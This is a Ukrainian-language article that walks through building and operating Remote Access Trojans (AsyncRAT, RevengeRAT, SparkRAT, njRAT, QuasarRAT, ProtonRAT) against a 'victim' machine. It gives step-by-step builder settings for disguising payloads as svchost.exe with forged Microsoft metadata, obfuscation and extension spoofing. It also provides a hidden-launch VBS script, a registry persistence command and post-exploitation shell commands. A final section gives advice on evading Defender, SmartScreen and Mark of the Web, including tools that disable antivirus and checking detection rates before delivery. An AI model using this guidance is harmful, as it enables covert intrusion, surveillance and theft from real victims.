Основи роботи з Remote Access Trojan (RAT)

У цій статті ми поговоримо про такий тип додатків як Remote Administration Tool, а саме про їх шкідливий різновид – Remote Access Trojan, скорочено RAT. Я розкажу як це працює, які існують види і типи RAT, а також як та для чого їх застосовують.

Що таке RAT і як він працює?

RAT (від англ. “rat” – щур) – це додаток для віддаленого адміністрування інформаційних систем (Remote Administration Tool), який працює по клієнт-серверній моделі (client-server), забезпечуючи безперервний зв’язок та доступ по TCP/UDP-протоколу між різними комп’ютерами через глобальну мережу інтернет. RAT може підтримувати чимало функцій віддаленої передачі даних, наприклад командний рядок, дистанційне керування пристроями, операції з файлами, створення знімків екрану, віддалений робочий стіл (RDP), керування службами і процесами у фоновому режимі та багато іншого.

RAT умовно можна поділити на два типи – легітимні і троянські. Легітимними є легальне програмне забезпечення з функціями віддаленого адміністрування – Remote Admininstration Tool. Наприклад, корпоративні засоби для системного управління і моніторингу: Radmin, TeamViewer, Any Desk, ConnectWise, VanillaRAT, MeshCentral та інші.

Троянськими додатками віддаленого доступу  – Remote Access Trojan, є ті, котрі використовуються з метою несанкціонованого доступу та збору інформації. В основі троянських RAT лежить бекдор, який може застосовувати шифрування і обходити антивірусний захист (AV), стабільно закріплюватися в системі у якості руткіта або стилера й безперервно з’єднюватися з сервером атакуючого (Сommand&Control (C2) Server) за вказаною у клієнті IP-адресою та портом.

Ланцюжок доставки та розгортання RAT умовно називають Kill Chain і він складається з наступних етапів:

1. Delivery (Доставка)
2. Execution (Виконання)
3. Persistence (Закріплення)
4. Propagation (Поширення)

Троянські RAT небезпечні тим, що можуть шифрувати і вилучати інформацію, перехоплювати введення клавіатури (keylogger), пересилати й завантажувати будь-які файли з комп’ютера жертви, встановлювати і запускати програмне забезпечення, захоплювати дані з браузерів (stylers) й поштовиків, розсилати спам, організовувати бот-нети і проводити DDoS-атаки, захоплювати аудіо/відео дані з системних пристроїв (мікрофон, веб-камера), змінювати налаштування реєстру, моніторити мережевий трафік та багато-багато іншого. Фактично, хакер отримує необмежений доступ до системи.

Приклади найвідоміших RAT: Dark Comet, njRAT, DarkCrypstal RAT, RADX Rat, ChaosRAT, RevengeRAT, Spark Rat, AsyncRAT, QuasarRAT, AmnesiaRAT, WSHRat, LimeRAT, Netwire, Cybergate, Vjw0rm, ClipBanker, VenomRAT тощо. З повним переліком троянів, які активно застосовувалися хакерами в атаках, можна ознайомитись на сайті MITRE ATT&CK.

Огляд відомих RAT

AsyncRAT

AsysncRAT – популярний Remote Access Trojan з відкритим вихідним кодом. Створений на C# і Net Framework. Має компактний інтерфейс, стабільно підтримує з’єднання, ідеально підходить для адміністрування, експериментів і навчання. Однак працює лише у Windows-середовищі. Хоча, за бажанням його можна запустити і в Linux з допомогою Wine (імпортувавши сертифікат). Станом на лютий 2026 року займає 5 сходинку за використанням хакерами по даним Any.Run Malware Trends Tracker.

Для запуску розпаковуємо архів і запускаємо виконуваний exe-файл:

На борту AsyncRAT доволі широкий функціонал. Інструмент діє по моделі Client-Server. Тобто, у якості сервера виступає сам додаток AsyncRAT, а от клієнт (агент) треба додатково зібрати.

При першому старті необхідно пройти операцію отримання сертифікату – AsyncRAT використовує його для безпечної зашифрованої комунікації. Файл збережеться в файлі ServerCertificate.p12. За потреби його можна перенести на інший комп’ютер.

Створення клієнта

Запускаємо AsyncRAT, клікаємо правою кнопкою миші і у контекстному меню обираємо в самому низу пункт BUILDER:

Далі з’явиться вікно з різними вкладками, де потрібно задати налаштування клієнта:

• Connection – в полі DNS вказуємо свою зовнішню IP-адресу (або хост, якщо є NGROK), а порт – будь-який публічно доступний. Перед цим бажано перевірити чи вони дійсно відкриті і доступні для публічного доступу з мережі інтернет.
• Install – задаємо назву файлу, наприклад svchost.exe або подібну, щоби зменшити ймовірність виявлення користувачем, а також вказуємо директорію, де файл буде розгортатися: %AppData% або %Temp%.
• Misc – тут вказуємо режим Anti-Analysis для того, щоби запобігти виявленню. Це ускладнить процес визначення вихідних даних С2-сервера. AsyncRat використовує AES-256 + PBKDF2 (сіль + 50к ітерацій). Це серйозна криптографія. IP сервера він не зберігає у явному вигляді. Він його розшифровує лише на долю секунди перед підключенням.
• Assembly – це дані вендора (розробника), які будуть прописані у властивостях файлу, їх можна підмінити, видавши файл за системний, наприклад:
  
  Product Name: Microsoft Windows Security Client
  Description: Windows Host Process
  Company: Microsoft Corporation
  Copyright: © Microsoft Corporation. All rights reserved.
  Trademarks: залиште порожнім або напишіть Windows
  Original Filename: svchost.exe
  Product Version / File Version: 6.1.7600.16385
• Icon – тут можна задати файлу будь-яку іконку, якщо є потреба.
• Build – останній пункт збирання агента RAT, додатково можна увімкнути галочку “Simple Obfuscation” для обфускації коду та зменшення ризиків виявлення.

Робота з клієнтом

Маскування шкідливих файлів та способи їх доставки на комп’ютер жертви ми докладно описували тут. Основне завдання – запустити файл клієнта, наприклад svchost.exe, у цільовій системі.Так, щоб він не був заблокований антивірусами чи іншими системами безпеки. А сам користувач не здогадався, що це шпигунський файл.

Після цього, агент з’єднається з C2-сервером і на панелі AsyncRAT з’явиться заповітний рядок статусу клієнта:

На сусідніх вкладках розміщена додаткова інформація:

• Logs – логи з’єднання, відкритих портів.
• Thumbnail – отримані зображення захопленого компа.
• Tasks – запущені на виконання завдання в клієнтах RAT.

Експлуатація

Функцій експлуатації в AsyncRAT чимало, що дозволяє іноді обійтись навіть без Meterpreter. Це рай для адміна і хакера. Переконатися у цьому дуже просто, достатньо виділити активний рядок статусу клієнта і викликати правою кнопкою миші контексте меню. В ньому буде перелік різноманітних функцій. Почати можна з розділу Miscellaneous -> Remote Shell, який відповідає за командий рядок Windows :

Перед нами з’явиться ще одне вікно-оболонка з Windows Command Line (CMD):

Ми можемо ввести будь-яку команду й відправити в шелл на виконання натиснувши кнопку Enter. Приклади команд:

• whoami – отримати ім’я користувача;
• whoami /user – коротка інформація по користувачу;
• whoami /all – розгорнута інформація по користувача;
• whoami /priv – список прав користувача;
• whoami /groups – список груп користувача;
• systeminfo – комплексна інформація по системі;
• net user – виводить список всіх користувачів системи;
• net localgroup – показує список всіх локальних груп.
• net accounts – показує налаштування облікових записів, наприклад довжина паролів і т.п.
• net user /<domain> – виводить список користувачів у конкретному домені;
• cd %appdata% && whoami – показує користувачів, які можуть виконувати команди у даній директорії;
• ipconfig – аналіз мережі;
• ipconfig /all – повний аналіз мережевих інтерфейсів;
• arp -a – вивід ARP-таблиці;
• netstat -ano – показує всі активні мережеві порти;
• route print – показує усі мережеві маршрути;
• nslookup 127.0.0.1 – показує DNS локального комп’ютера;
• tasklist – список активних процесів;
• tasklist /v | findstr /i "high system" – перевірити чи є процеси з високими правами;
• dir – переглянути поточний каталог;
• net user administrator hacker_123321 – змінити пароль облікового запису, у даному випадку для “administrator”;
• net user Administrator – перевірити статус користувача;
• net user Administrator /active:yes – активувати вбудованого адміністратора;
• certutil.exe -urlcache -split -f https://github.com/itm4n/PrivescCheck/releases/latest/download/PrivescCheck.ps1 – завантажити скрипт для аудиту безпеки Windows. 
• get-mppreference – інформація про Windows Defender.

Revenge RAT

Переходимо до наступного інструменту віддаленого адміністрування – RevengeRAT. Він відомий тим, що його застосовували реальні організовані хакерські групи після початку російсько-української війни. Це додаток більш високого рівня, імхо, в ньому містяться гнучкіші та розширеніші функції для стадії інфікування та закріплення в системі.

Завантажити RevengeRAT можна з публічного репозиторію Ultimate RAT Collection. Розпаковуємо архів й запускаємо виконуваний exe-файл:

При старті необхідно вказати ключ сокета (“Revenge-RAT” по замовчуванню, але бажано придумати унікальну і складну назву, інакше ключ можна підібрати і повторно використовувати для з’єднання) та доступний порт, після чого відкриється панель RevengeRAT:

Давайте одразу перейдемо до билдера. У ньому дещо більше налаштувань ніж в AsyncRAT, розберемо їх:

• Network Settings – вписуємо сюди IP-адресу (або ім’я хоста/DynDNS) та порт сервера, на який прийматимемо з’єднання. Тиснемо кнопочку “+” та додаємо їх.
• Basic Settings – вводимо унікальний ідентифікатор клієнта (наприклад, win10hack), тиснемо на кнопку “+” біля mutex (запобігає повторному запуску копій), delay (затримку) залишаємо без змін.
• Install Settings – вказуємо ім’я дропа, наприклад svchost.exe – під ним шкідливий файл збережеться в системі (це не назва файлу клієнта!). Далі обираємо розташування, де він зберігатиметься, можна обрати зі списку: Application Data (рекомендовано), My Documents, Start Menu, Templates, System32, History, Recent. Додатково вмикаємо опції додавання запису в реєстр і автоматичні завдання (таски), теж вказуючи відповідні імена. Опцію “Complex Method” можна не вмикати (автоматично інфікує шортлінки в Desktop -> Quick Launch і запускає клієнт по кліку з ними).
• Startup Settings – створює файли для автозапуску. Треба вказати складне для детекту ім’я. Доступні формати файлів:.File, .vbs, .lnk, .vbs, .js, .url, .exe (CodeDom).
• PowerShell Settings – тут можна вказати команду, яка виконається при встановленні RAT. Команда, яка тут присутня по замовчуванню – виведе системне вікно з написом “Hello World!”. Цікаво, якщо натиснути на кнопку “Test” її можна одразу протестувати (хороша функція). Але, поки що, можна не вмикати. Тим більше, це можна зробити самотужки вже після закріплення.
• Multi Binder Settings – корисна техніка маскування, яка дозволяє здійснити біндинг (об’єднання) кількох різних файлів в один.
• Hosts File Settings – ще одна корисна функція для хакерів, модифікує файл hosts для блокування/підміни веб-сайтів. Наприклад, можна закріпити доменне ім’я facebook.com за фішинговим дзеркалом, яке контролює хакер. Приклад: X.X.X.X facebook.com www.facebook.com.
• Notification Settings – вмикає сповіщення, яке з’явиться для жертви при успішному встановленні RAT. За необхідності, його можна модифікувати під якийсь сценарій. Може підійти для тесту, для прихованого встановлення краще вимкнути.
• Icon Settings – застосовує техніку Icon Spoofing до шкідливого файлу. Іноді корисно для замаскування виконуваного файлу під документ, наприклад PDF. Корисно поєднувати з біндингом.
• Assembly Settings – прописує метадані у властивостях файлу. Таким чином, можна підробити легітимний додаток. Застосовувати свій розсуд, в залежності від сценарію. Ось заготовка для підробленого svchost.exe:
  File description: Host Process for Windows Services
Type: Application
File Version: 8.1.1.7900
Product name: Intel(R) Common User Interface
Product version: 8.1.1.7900
Copyright: Copyright 1996-2006. Intel Corporation
• Inject Settings – ін’єкція коду в інші додатки, які можна обрати з переліку (наприклад, MSBuild.exe). Вмикати за необхідності.
• Spread Settings – налаштування встановлення RAT через USB-накопичувач.
• Module Persistent Settings – налаштування для постійного закріплення в системі, наприклад виконання з правами адміністратора (вимагає права адміністратора, не рекомендується), інтеграція в реєстрі, приховування файлу, обфускація, приорітетність, засипляння тощо. Доступні опції захисту від виявлення: Anti Tampering, Anti ILDASM, Obfuscate Public Types, String Encryption, Obfuscation. Рекомендується вмикати, в залежності від рівня захисту цільової системи та потреб. Наприклад, якщо ви хочете приховати будову файлу і ускладнити його подальший реверс-аналіз дослідниками безпеки, рекомендується увімкнути всі можливі методи анти-аналізу і обфускації.
• Compile Settings – додаткові налаштування для обходу систем безпеки. Наприклад, “Random Namespace” – Class Name” – випадкові імена класів для ускладнення аналізу; “Execution Spoofer” – корисна хакерська техніка маскування виконуваного файлу під популярні розширення, які можна обрати із запропонованого списку: .mp4, .mp3, .m3u, .zip, .rar, .jpg, .ico, .pdf, .docx, .doc, .ppt. При запуску користувач побачить, що відкривається, наприклад, відео або документ, але на ділі запуститься RAT. Корисно комбінувати з біндингом та спуфінгом іконки. “File Pumper” – штучно збільшує розмір файла, що може допомогти при обході захисту у деяких системах, наприклад поштовиках.

Тиснемо “Compile” й зберігаємо файл клієнта RAT під будь-яким ім’ям. У деяких версіях може додатково попросити вказати ключ сокета і порт – вказуємо ті ж, що й при старті.

На замітку: RevengeRAT дозволяє створювати різні профіля користувача зі збереженням шаблонів налаштувань. Таким чином ви можете повторно застосовувати різні сценарії атак для різних типів систем.

Експлуатація

Після успішної доставки і розгортання на комп’ютері жертви, на панелі RevengeRAT тут же засвітиться “маячок” з клієнтом:

Заувага: Клієнти RevengeRAT використовують обфускатор DotNET Reactor, а тому потребують попередньо встановленого .NET Framework 4.0-4.5 на цільових системах. Без цього вони не запустяться. Хоча, більшість додатків, таких як MS Office, по-замовчуванню встановлюють цей пакет.

Якщо обрати і клікнути правою кнопкою миші – з’явиться контексте меню з різноманітними функціями для експлуатації:

Давайте розберемо їх:

• Control Center
  • File Manager – файловий менеджер, доступ до файлової системи, дискових накопичувачів, з можливістю шукати, читати, вилучати, завантажувати файли.
  • Remote Desktop Protocol – з’єднання по протоколу RDP, керування віддаленим робочим столом.
  • Remote WebCam – захоплення відео з веб-камери.
  • Audio Feed – захоплення аудіо з мікрофону.
  • Keylogger – захоплення тексту введеного з клавіатури.
  • System Manager – менеджер системних прогцесів, подій, завдань і т.д.
• Extra
  • Pastime – функції надсилання системних повідомлень, наприклад виведення службових вікон або підказок на робочому столі, виконання системних подій (вкл/викл пристроїв, перезавантаження ПК, відкриття веб-сайтів) та ін.
  • Chat – чат між комп’ютером атакуючого і комп’ютером-жертвою (клієнтом).
  • Torrrent Seeder – використання системи жертви для роздачі торентів.
  • System Information – детальна інформація про систему.
  • Passwords Recovery – пошук паролів користувачів.
  • Request Elevation – підвищення прав.
• Execute
  • Scripts – виконання скриптів на комп’ютері жертви: PowerShell, VBS, Shellcode та інші.
  • Download and Execute – завантажити файл і запустити його на комп’ютері жертви.
  • Upload and Execure – завантажити файл з комп’ютера атакуючого на комп’ютер жертви і запустити.
• Client
  • Ping – пропінгувати комп’ютер жертви
  • Update – оновити клієнт.
  • Disconnect – розірвати з’єднання з клієнтом.
  • Uninstall – видалити клієнта з системи жертви.
  • Restart – перезапустити клієнт.
  • Close – закрити процес клієнта.
• Select
  • Select All – обрати всі клієнти на лістингу панелі RevengeRAT.
  • Select None – зняти виділення.
• Open Folder – відкрити папку збереження даних клієнта.

На замітку: Попри те, що RevengeRAT застосовує різноманітні засоби обфускації та уникнення від виявлення, Windows Defender розпізнав практично усі компіляції цього шпигунського ПЗ. Але за відсутності Defender – користувацька система вразлива на 100%. Не ігноруйте цим. Варто також зауважити, що усі спроби зараження фіксуються операційною системою і метадані атакуючих машин пересилаються на сервера Microsoft задля подальшого вивчення…
 

Spark RAT

Spark RAT –  напівлегітимний, Remote Access Trojan/Administration Tool, який характерезується простотою, надійністю та ефективністю. Його на професійному рівні застосовували різні APT-групи, хоча він цілком може знадобитися в роботі будь-якого системного адміністратора.

Інструмент кросплатформний, має збірки для Windows, Linux, MacOS. Можна запустити на Android. Написаний на Go, з повністю відкритим вихідним кодом. Складається з фронтенду і бекенду. На бекенді запускається простенький listener, у фронтенді – дашборд на localhost:port з HTTP-авторизацією (basic auth), який треба прописати в конфігурації config.json (створити самому у кореневому каталозі), приклад:

{
    "listen": ":8000",
    "salt": "123456abcdef123456", 
    "auth": {
        "username": "password"
    },
    "log": {
        "level": "debug",
        "path": "./logs",
        "days": 7
    }
}

Сервер запускається виконанням файлу: server_windows_amd64.exe.

Для створення клієнта у веб-панелі SparkRAT є значок у вигляді шестерні, треба на нього натиснути і з’явиця вікно генерації:

Конфігурація наступна: Host – IP-адреса сервера-приймача; Port – порт на якому слухає сервер, має співпадати з портом, на якому висить сама панель, інакше лістенер не запрацює (по суті він працює один на двох); Path – шлях зберігання; OS/Arch – операційна система і архітектура цільового комп’ютера. Тиснемо ОК і зберігаємо exe-файл клієнта. Далі просто закидаємо його на машину-жертву і виконуємо. Клієнт створить зворотній шелл з C2-сервером і на лістингу отримаємо у веб-панелі статус захопленого комп’ютера:

Керування здійснюється через кнопки розділу “Operations”:

• Terminal – відкриється термінал Windows CMD;
• Explorer – відкриється файловий менеджер на цільовій системі з можливостями FTP;
• Process – панель керування процесами;
• Execute – виконання команд.
• Desktop – налагодження віддаленого робочого столу;
• Screenshot – створення скріншотів. 
• Lock – заблокувати віддалений комп’ютер (вмикає екран блокування);
• Logoff – вийти з активної сесії користувача (розлогінитися);
• Hibernate – перейти в стан гібернації (сну);
• Suspend – енергозберігаючий режим;
• Restart – перезавантаження комп’ютера;
• Shutdown – вимкнення комп’ютера;
• Offline – перевести клієнта в офлайн з можливістю повторно перепідключення.

В папці /logs зберігаються усі логи і варто їх передивитись, якщо якась функція не працює. Рівень логів задається в вищезгаданому файлі config.json.

Сам клієнт доволі легітимний, після запуску він відкривається в розгорнутому вікні CMD. Якщо його закрити – з’єднання розірветься. Звузити поверхню виявлення можна різними додатковими ручними методами, наприклад:

• Передати клієнт у парі з run.vbs, який непомітно запустить шкідливе навантаження client.exe, ось його вміст:

Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "client.exe", 0, False
Set WshShell = Nothing

• Додати в реєстр: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsUpdate" /t REG_SZ /d "C:\Path\To\run.vbs" /f

NjRAT

Один з найпопулярніших “ратників” на сьогодні. Розроблений арабськими хакерами M38dHhM на базі .NET Framework. Windows Defender класифікує його як Backdoor.MSIL.Bladabindi. Вперше виявлений у червні 2013 року.

NjRAT містить величезну кількість версій та модифікацій (Green Edition, Lime Edition, Golden Edition, Danger Edition). До прикладу, остання публічно злита версія NjRAT 0.9d є справжнім “комбайном”, що буде до смаку кожному хакеру:

Веб-інтерфейс NjRAT 0.9d

Розберемо основні елементи керування NjRAT. За основу візьмемо стабільну версію 0.9d. Одразу після запуску додаток попросить вказати порт слухача для прийому зв’язку (listener), після чого з’явиться панель керування RAT. Генерація пейлоаду відбувається через меню Tools -> Payload (в інших версіях через меню Builder), де вказуються стандартні для збірки клієнта дані:

• App Info – початкове налаштування клієнта. Вмикаються опції збірки, наприклад DotNET-обфускатор, Mpress-компресор, RPX (RunPE executor). Додатково можна вказати іконку, назву файлу і папку збереження для розгортання дроппера: %TEMP%, %AppData%, %UserProfile%, %AllUsersProfile%. %WinDir%.
• DNS Info – вказується активні хост та порт з’єднання з NjRAT-сервером.
• Properties – додаткові  опції закріплення в системі, наприклад додавання в реєстр і планувальник завдань.
• MergingApp – злиття (біндинг) з іншими, наприклад легітимними, файлами. Вибір назв та іконки.
• Build – фінальна частина компіляції. Кнопка “Build” автоматично згенерує виконуваний exe-файл клієнта, який потрібно зберегти і відправити на машину “жертви”.

До речі, у версії NjRAT 0.7D є ряд інших ексклюзивних функцій. Наприклад, окремий блок налаштувань “Assembly”, який дозволяє додавати свої дані розробника до будь-якого exe-файлу, причому застосувати деякі ексклюзивні функції:

• Змінити іконку (.ico)
• Рандомно згенерувати дані вендора
• Склонувати дані вендора з іншого exe-файлу

Функції керування NjRAT 0.9d:

• File Manager – файловий менеджер, менеджер процесів, менеджер реєстру.
• Run File – запустити файл у цільовій системі.
• Remote Desktop – налагодження RDP доступу.
• Get Passwords – отримати паролі (якщо доступні).
• Location Manager – визначає локацію комп’ютера жертви з позначкою на мапі, часовою зоною і координатами.
• Camera Manager – керування веб-камерою.
• Shell Terminal – класичний термінал Windows.
• Applications – показує запущені додатки і навантаження на процесор CPU.
• Microphone – керування мікрофоном.
• Keylogger – стандартний кейлоггер.
• Settings – налаштування.
• Victim (операції з клієнтом)
  
  • Update – оновлення клієнта, через завантаження нового exe з локального диску або через URL-адресу.
  • Uninnstall – повне видалення клієнта з цільової системи.
  • Restart – перезапуск клієнта.
  • Close – закрити клієнт.
  • Disconnect – розірвати з’єднання з клієнтом.
• Open Folder – відкрити папку зі збереженими даними клієнта.
• Chat Manager – відкрити чат з користувачем “захопленого” комп’ютера.
• Fun Manager – 
• Call Manager – керування дзвінками.

З лабораторією по створенню і розгортанню NjRAT можна ознайомитись тут.

Quasar RAT

Quasar RAT – напівлегітимний засіб для віддаленого адміністрування операційних систем Windows (7-11). Написаний на C#, використовує технологію .NET, має відкритий вихідний код OpenSource MIT License.

За своєю структурою та управлінням нагадує AsyncRAT. Після першого запуску необхідно згенерувати сертифікат з розширенням .p12. Також з’явиться вікно брандмауера Windows – необхідно адати додатку доступ до усіх типів мережі (Private/Public). Або зробити це вручну через wf.msc і додати Inboud/Outbound правила.

Панель Quasar RAT не складна в опануванні і складається всього з декількох пунктів меню:

• File – операції з додатком.
• Settings – основні налаштування QuasarRAT.
• Build – налаштування для збірки клієнта.
• About – інформація про додаток.

Після того як клієнт вийде з сервером на зв’язок, в панелі Quasar RAT на лістингу з’явиться нове з’єднання:

Quasar RAT містить практично усі функції, що і його аналоги. Має простий і зрозумілий інтерфейс. Найзручніше його використовувати для професійного віддаленого адміністрування Windows. Усі дані подаються в зручному і читабельному вигляді. З’єднання стабільне і мінімум підвисань. З цікавих функцій – є можливість налагодити Reverse Proxy.

Proton RAT

ProtonRAT – комерційний інструмент віддаленого адміністрування на базі .NET. З’явився у 2017 році на одному з хакерських форумів зі стартовою ціною від 120 тис. доларів. Згодом його виявили, дослідили та злили одну з версій в інтернет на GitHub.

Інструмет заслуговує на увагу. Добре структурований, з компактним і зручним інтерфейсом. Містить вбудований .NET-обфускатор – SmartAssembly. Конфігурація C2 шифрується AES/RSA. За своїм типом нагадує AsyncRAT. Билдер максимально простий і не містить складних налаштувань: присутня генерація Mutex, логгінг, дебаггінг. З функцій закріплення – Startup persistence і BSOD (синій екран “смерті” при спробі убити процес).

ProtonRAT надзвичайно мінімалістичний, можливо тому у нього колись були найнижчі показники виявлення антивірусними системами. З особливостей можна відзначити чудову реалізацію файлового менеджера, що нагадує Total Commander, зчитування даних з буферу обміну і ексклюзивну функцію Text-to-Speech (відправка текстових повідомлень користувачу цільової системи, які переводяться в  голосові повідомлення):

 

Як обійти захист Windows?

Це найцікавіша частина хакерського мистецтва. Питання, яке хвилює багатьох. Багато в чому залежть від рівня обізнаності, креативності та майстерності хакера. Але цілком можливо. Мало не щодня з’являються сотні тисяч нових і нових загроз, рядків зловмисного коду, сигнатури яких не одразу потрапляють до антивірусних баз даних. Чим і користаються дослідники безпеки, проводячи свої атаки.

Обхід антивірусної системи Windows полягає, насамперед, у досконалому розумінні логіки роботи цієї операційної системи, її архітектури. Як вона перевіряє, обробляє та відрізняє безпечні файли від небезпечних. Як класифікує різні типи вмісту і рівні небезпеки. Чому одні файлу завантажуються з інтернету і відкриваються без жодних попереджень, тоді як інші одразу блокуються і вилучаються. Що таке цифровий підпис, MoTW, SmartScreen, UAC, і як вони працюють?

У цьому напрямку також потрібне вивчення різноманітних зразків зловмисного програмного коду. Допоможуть такі інструменти як: Ghidra, IDA, Radare2, x64dbg/OllyDbg, dnSpy, ILSpy тощо. Проводити статичний і динамічний аналіз. Відпрацьовувати вже існуючі та відомі сценарії, додаючи власні напрацювання.

Існує також чимало незадокументованих багів, недоліків та дір безпеки (включаючи Zero Day) Windows, які при відповідному підході можна проексплуатувати.

Cписок останніх CVE Windows:

• CVE-2026-21510 – Windows Protect Mechanism Bypass
• CVE-2026-21513 – Windows Protect Mechanism Bypass and MSHTML Vulnerability
• CVE-2026-21514 – Microsoft Word Security Feauture Bypass (OLE Vulnerability)
• CVE-2026-21519 – Windows Desktop Elevation of Privilegy
• CVE-2026-21525 – Windows Remote Access Connection Manager (ResMan) Vulnerability
• CVE-2026-21533 – Windows Remote Desktop Services Elevation of Privilege
• CVE-2026-20841 – Windows 11 Markdown Links Vulnerability

Все це – довготривала і захоплива дослідницька робота, в результаті якої можна виявити закономірності й побудувати власну методологію, яка запрацює на практиці.

Захист в додатках Microsoft Office (починаючи з 2010 версії) для файлів з позначкою Mark of the Web. Автоматично вмикається захищений режим “Protected view” з блокуванням макросів і скриптів. Користувач може відключити його натиснувши “Enable Editing”.

Деякі зауваження, поради та рекомендації по обходу захисту Windows:

• Використовувати менш відомі або кастомні RAT, яких нема в базах. Як варіант, написати свій власний троян (наприклад, на Go або C++), якого точно нема в сигнатурах.
• Використовувати “криптори” — програми, які шифрують та модифікують виконуваний файл для обходу AV (наприклад, Shellter, Veil-Evasion, PE Crypters). Але їх теж часто детектять. Хоча, є самописні криптори типу FUD (Full Undetectable), які успішно обходять захист Windows.
• Використовувати обфускатури, які заплутують код клієнтів і зменшують його читабельність, що зменшує поверхню виявлення. Наприклад, ConfuserEx, NET.Reactor, Babel Obfuscator, Obfuscar Obfuscator, EazFuscator. Також використовувати обфускацію для команд PowerShell. Існують також обфускатори Python.
• Використовувати техніки маскування файлів. Експлуатувати налаштування Windows по-замовчуванню – приховування файлів з поміткою hide та відомих розширень, які грають на руку хакерам.
• Застосовувати метод Living-off-the-land Binaries (LOLbin) — використання вбудованих системних інструментів Windows (PowerShell, WMI, MSBuild) для виконання віддалених команд. Один з найефективніших на сьогодні bypass-методів.
• Застосовувати техніки та інструменти обходу MotW (Mark of the Web) – це ідентифікатор метаданих, який використовується Microsoft Windows для позначення файлів, завантажених з різних джерел (Інтернет, дисковий носій, локальна мережа, локальний комп’ютер і т.д.), як потенційно небезпечних. Браузери Google Chrome через Windows API автоматично додають цей маркер до файлыв завантажені з інтернету. Microsoft Office також перевіряє наявність маркера «Mar-of-the-Web», і якщо знайде, документи відкриються в захищеному режимі перегляду з файлом у режимі лише для читання та вимкненими макросами. MotW працює лише в файлових системах NTFS. На даний момент, “мотву” обходять переважно з допомогою файлів-контейнеріів:.iso, .vhd, .vhdz, .7z, .zip, .img, .cab. Усе, що в них покладено – буде без маркування Zone Identifier. Також раніше експлуатували баг з LNK-файлами (шортлінки), але його виправили в CVE-2024-38217. Деякі настільні поштові клієнти не позначали MotW, якщо замість кнопку “Зберегти” файли просто перетягували. Російські архіватори 7-Zip і WinRAR до недавнього часу не підтримували позначку MotW (CVE-2025-0411, CVE-2025-31334), але потім їх додали як необов’язкову опцію (вмикаються на розсуд користувача). Аналогічно з протоколом WebDAV (CVE-2024-38213). MotW досі не застосовують службові утиліти Windows: curl, bitsadmin, certutil, msiexec та інші. Не додає Zone Identifier і Git. Різні стратегії зловживанням MotW були описані дослідниками OUTFLANK.
• Використовувати складні багаторівневі техніки обходу Smart Screen, SmartAppControl, AV і UAC (User Account Control), закріплення (persistence), підвищення привілеїв (privilege escalation) і пост-експлуатації (post-exploitation). У цьому можуть допомогти такі додатки як: Msfvenom, Meterpreter, Cobalt Strike, PowerShell Empire, Mimikatz (аналізує оперативну пам’ять на наявність витоків), Defendnot (відключає Windows Defender).
• Використовувати різноманітні портативні легальні додатки: rar.exe, python.exe, postman.exe, 7z.exe, telegram.exe, putty.exe, socat, OpenSSH, AutoIT (скрипти для запуску додатків), XenArmor (відключає Windows Defender, збирає ключі і паролі), LaZagne і т.д. Деякі їх функції можуть знадобитися на стадії розгортання. Окрім того, вони чудово маскуються.
• Використовувати техніку маскування під легітимні процеси.
• Використовувати third-party хмарні сервіси HTTPS/WebDAV для доставки шкідливих навантажень, наприклад: Dropbox, GitHub, Pastebin, Heroku, Cloudflare, Filen.io та інші. Для Windows це більш надійні джерела, аніж локальні сервери Python.
• Активно практикувати Python. Дуже перспективний напрямок. Дедалі більше ІТ-систем та веб-додатків включають його в частину своєї архітектури. Прийде час, коли без Python взагалі складно буде уявити жодну систему чи додаток. Можливості Python для дослідників безпеки і хакерів – безграничні.
• Активно практикувати Криптографію і Reverse/Malware analysis. Розуміти як працюють різні алгоритми шифрування, бінарники, компілятори, дизасемблери. Розробляти власні RAT і криптори. Аналізувати, вивчати роботу різних евристичних, сигнатурних, поведінкових антивірусних систем.
• Вивчати та поглиблювати різні методи, інструменти фішингу та соціальної інженерії. Досвід показує, що близько 75% успішних атак APT-груп пройшли через шлюзи електронної пошти.

В Windows наступний список розширень має підвищений ступінь ризику: . appref-ms, .ade, .adp, .app, .asp, .bas, .bat, .cer, .chm, .cmd, .com, .cpl, .crt, .csh, .dll, .drv, .exe, .fxp, .gadget, .grp, .hlp, .hta, .inf, .ins, .isp, .its, .js, .jse, .ksh, .lnk, .mad, .maf, .mag, .mam, .maq, .mar, .mas, .mat, .mau, .mav, .maw, .mcf, .mda, .mdb, .mde, .mdt, .mdw, .mdz, .msc, .msh, .mshxml, .msi, .msp, .mst, .msu, .ops, .ocx, .pcd, .pif, .pl, .ps1, .prf, .prg, .pst, .reg, .scf, .scr, .sct, .sys, .shb, .shs, .tmp, .url, .vb, .vbe, .vbs, .vxd, .vsmacros, .ws, .wsc, .wsf, .wsh.

Для тестування обходу антивірусних систем можна скористатися такими онлайн-сервісами як: VirusTotal, OTX Alient Vault, Hybrid Analysis, ANY.RUN, Joe Sandbox, Cuckoo Sandbox, OPSWAT Metadefender, DocGuard. Вони дадуть оцінити рівень виявлення шкідливого додатку. Просто завантажте в їх “пісочницю” різні зразки чи компіляції шкідливого файлу й перевірте як вони будуть розпізнаватися популярними детекторами. У більшості випадків, якщо детектори “мовчать”, то й Windows Defender/Сhrome не бачитиме загрози. Однак, тут є і інша сторона медалі – антивіруси збережуть усеб зразки даних і в майбутньому вони зможуть почати детектися. Тому фінальне тестування краще проводити на віртуальній/локальній машині (напр. SIFT Workstation або REMnux).

Не зайвим буде перед доставкою шкідливого файлу перевірити як його розуміє і бачить система, чи є у ньому відкриті незашифровані дані:

1. file svchost.exe – покаже нам як система визначає цей файл, наприклад “PE32 executable for MS Windows 4.00 (GUI), Intel i386 Mono/.Net assembly, 3 sections”.
2. strings -n 10 -e l svchost.exe – поверхнево перевіряє вміст і показує те, що побачила система, включно із зашифрованими і обфускованими рядками (не розшифровується). Аналог цієї утиліти в Windows.
3. Відкрити файл клієнта в статичних реверс-аналізаторах Die, PE Bear, PE ID, Pe Explorer, Dependency Walker, Resource Hacker, 001 Editor, dnSpy. Визначити тип пакувальника/обфускатора. Перевірити усі текстові поля, класи, методи. Виявити чи є там зашифровані або незашифровані дані.
4. Якщо обфускація присутня, додатково можна перевірити її рівень. Для цього треба встановити відповідний деобфускатор, наприклад Simple Assembly Explorer або de4dot для .NET. Очищений файл можна знову відкрити у вищезгаданих додатках/командах для реверс-аналізу. Приклад команд: de4dot.exe malware.exe і strings.exe malware-cleaned.exe
